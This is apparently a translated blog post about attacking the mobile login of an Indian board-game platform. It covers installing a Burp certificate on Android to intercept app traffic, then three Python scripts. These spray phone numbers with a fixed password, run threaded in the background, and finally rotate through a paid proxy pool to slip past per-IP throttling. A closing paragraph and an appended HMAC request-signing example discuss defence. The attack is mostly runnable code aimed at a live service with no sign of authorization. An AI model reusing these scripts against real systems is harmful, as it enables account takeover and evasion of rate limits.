The site runs xiaocms with the front-end guestbook (comment) feature removed, so a back-end CSRF attack cannot be carried out.
Brute force is possible, but without knowing the username the chance of cracking an account is very small.
No other ideas for now.

openssl x509 -inform DER -in burp.cer -out burp.pem
openssl x509 -inform PEM -in burp.pem -subject_hash_old -noout
Rename the PEM file to the 8-character certificate hash printed by the command above: burp.pem > 9a3b2a3e.0
Push 9a3b2a3e.0 into the Android system CA directory: adb push 9a3b2a3e.0 /system/etc/security/cacerts/
adb shell chmod 644 /system/etc/security/cacerts/9a3b2a3e.0
adb shell chgrp root /system/etc/security/cacerts/9a3b2a3e.0
import requests

url = "https://aaaa.com/login/moblie"
# Enumerate the 6-digit suffix after the fixed 919840 prefix
for num in range(999999):
    num_str = "{:06d}".format(num)
    mobile = f"919840{num_str}"
    data = {"mobile": mobile, "password": "abcd123456", "ipInfo": {"status": "success"}}
    try:
        res = requests.post(url=url, json=data, timeout=5)
        print(mobile + "," + res.text)
    except Exception:
        print("request failed")
nohup python3 mobile_brute.py > result.log 2>&1 &
import requests
from concurrent.futures import ThreadPoolExecutor
import datetime


def brute(start, end):
    url = "https://target/user/login/mobile"
    for num in range(start, end):
        num_str = "{:06d}".format(num)
        mobile = f"919840{num_str}"
        data = {"mobileNo": mobile, "password": "a123456", "ipInfo": {"status": "success"}}
        try:
            # No proxy yet in this version; every request leaves from the same IP
            res = requests.post(url=url, json=data, timeout=10)
            print(mobile + "," + res.text)
        except Exception as e:
            print(mobile + str(e))


if __name__ == '__main__':
    startime = datetime.datetime.now()
    # Split the 6-digit space into 10 chunks, one per worker thread
    num = [{"start": 1, "end": 100000}, {"start": 100001, "end": 200000}, {"start": 200001, "end": 300000},
           {"start": 300001, "end": 400000}, {"start": 400001, "end": 500000}, {"start": 500001, "end": 600000},
           {"start": 600001, "end": 700000}, {"start": 700001, "end": 800000}, {"start": 800001, "end": 900000},
           {"start": 900001, "end": 999999}]
    with ThreadPoolExecutor(max_workers=10) as executor:
        for i in range(10):
            executor.submit(lambda cxp: brute(*cxp), (num[i].get('start'), num[i].get('end')))
    endtime = datetime.datetime.now()
    print(endtime - startime)
nohup python3 mobile_brute.py > result.log 2>&1 &
This was clearly abnormal: I took the phone number behind the first "success", 919843558247, and tried logging in with it in the app, which reported that the number was not registered.
Choosing a proxy: I surveyed several IP proxy pool vendors, which offer a few proxy types: residential, datacenter and ISP. Residential IPs are those used in private homes; datacenter IPs belong to data centers around the world. Both types come in static and rotating modes. For my purposes automatic IP switching was best, so I chose datacenter in rotating mode with a shared proxy pool, which gives the best value for money.
First, test whether the proxy can switch IPs dynamically.
import requests
from concurrent.futures import ThreadPoolExecutor
import datetime


def brute(start, end):
    # Rotating proxy credentials (redacted in the original post)
    proxy_user = "*********"
    proxy_pass = "*****"
    proxies = {"http": f"http://{proxy_user}:{proxy_pass}@pr.****.com:16666",
               "https": f"http://{proxy_user}:{proxy_pass}@pr.****.com:16666"}
    url = "https://target.com/user/login/mobile"
    for num in range(start, end):
        num_str = "{:05d}".format(num)
        mobile = f"9198450{num_str}"
        data = {"mobileNo": mobile, "password": "a123456", "ipInfo": {"status": "success"}}
        try:
            res = requests.post(url=url, json=data, proxies=proxies, timeout=10)
            text = mobile + "," + res.text
            print(text)
        except Exception as e:
            timeout_mobile = mobile + ",timeout"
            print(timeout_mobile + "," + str(e))


if __name__ == '__main__':
    startime = datetime.datetime.now()
    # Split the 5-digit space into 10 chunks
    num = [{"start": 1, "end": 10000}, {"start": 10001, "end": 20000}, {"start": 20001, "end": 30000},
           {"start": 30001, "end": 40000}, {"start": 40001, "end": 50000}, {"start": 50001, "end": 60000},
           {"start": 60001, "end": 70000}, {"start": 70001, "end": 80000}, {"start": 80001, "end": 90000},
           {"start": 90001, "end": 99999}]
    with ThreadPoolExecutor(max_workers=4) as executor:
        for i in range(10):
            executor.submit(lambda cxp: brute(*cxp), (num[i].get('start'), num[i].get('end')))
    endtime = datetime.datetime.now()
    print(endtime - startime)
Finally, what I want to say is that in both attack and defense the most important thing is the return on investment; over-investing in defense is not necessarily good, and the ROI may be negative. In this case I think the target's strategy was quite good: by detecting frequent requests from a single IP and throttling access to the business, it forces the attacker to buy a proxy pool, and to raise the yield the attacker may even have to add machines and run the attempts distributed, which costs even more. From the defender's perspective the service could still be made more secure without much extra cost, simply by digitally signing every request: obfuscate the client-side signing code and the HMAC key, and an attacker has to spend a lot of time decompiling the client. Some signing functions are even loaded dynamically from a .so library, which makes the signing logic and key harder still to find.
Originally published on the WeChat public account (信息安全笔记): Penetrating an Indian board-game platform
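The per-request signing the closing paragraph recommends, shown as an added example that is not code from the original post. It signs the login body with HMAC-SHA256 over a timestamp, a nonce and a canonical JSON encoding, and the server-side verifier rejects stale, replayed or tampered requests; the key, the 300-second skew window and the field layout are assumptions for the example.

```python
import hashlib
import hmac
import json
import time

# Constructed shared key for this example; in production it lives in the
# (obfuscated) client and in the server's secret store, never in the request.
SECRET_KEY = b"example-shared-hmac-key"
SKEW_SECONDS = 300  # how far a request timestamp may drift from server time


def canonical(body: dict) -> bytes:
    """Serialize the JSON body deterministically so client and server hash identical bytes."""
    return json.dumps(body, sort_keys=True, separators=(",", ":")).encode()


def sign(body: dict, ts: int, nonce: str, key: bytes = SECRET_KEY) -> str:
    """Client side: HMAC-SHA256 over timestamp | nonce | canonical body."""
    msg = b"|".join([str(ts).encode(), nonce.encode(), canonical(body)])
    return hmac.new(key, msg, hashlib.sha256).hexdigest()


class SignatureVerifier:
    """Server side: reject stale, replayed or tampered login requests."""

    def __init__(self, key: bytes = SECRET_KEY, skew: int = SKEW_SECONDS):
        self.key = key
        self.skew = skew
        self.seen_nonces = {}  # nonce -> timestamp, pruned as entries age out

    def verify(self, body: dict, ts: int, nonce: str, signature: str, now=None):
        now = time.time() if now is None else now
        if abs(now - ts) > self.skew:
            return False, "stale timestamp"
        # Forget nonces older than the skew window; anything older is already stale
        self.seen_nonces = {n: t for n, t in self.seen_nonces.items() if now - t <= self.skew}
        if nonce in self.seen_nonces:
            return False, "replayed nonce"
        expected = sign(body, ts, nonce, self.key)
        # Constant-time comparison so the check does not leak via timing
        if not hmac.compare_digest(expected, signature):
            return False, "bad signature"
        self.seen_nonces[nonce] = ts
        return True, "ok"
```

A login attempt whose body was altered after signing, or whose nonce was already used, fails before the credentials are ever checked, so a brute-force loop without the client's signing logic gets nothing but signature errors.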